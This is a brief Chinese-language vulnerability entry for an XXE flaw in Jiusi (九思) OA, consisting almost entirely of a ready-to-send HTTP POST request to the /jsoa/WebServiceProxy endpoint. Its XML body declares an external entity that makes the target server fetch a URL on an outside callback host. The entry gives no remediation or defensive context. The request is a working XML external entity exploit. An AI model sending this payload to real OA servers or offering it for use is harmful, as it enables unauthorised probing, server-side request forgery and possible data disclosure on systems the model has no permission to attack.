漏洞描述
九思OA XXE漏洞
POST /jsoa/WebServiceProxy HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 139
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE aaa [<!ENTITY name SYSTEM "http://[REDACTED]/i/b2e5a7/xm0w/9kfw/" >]><name>&name;</name>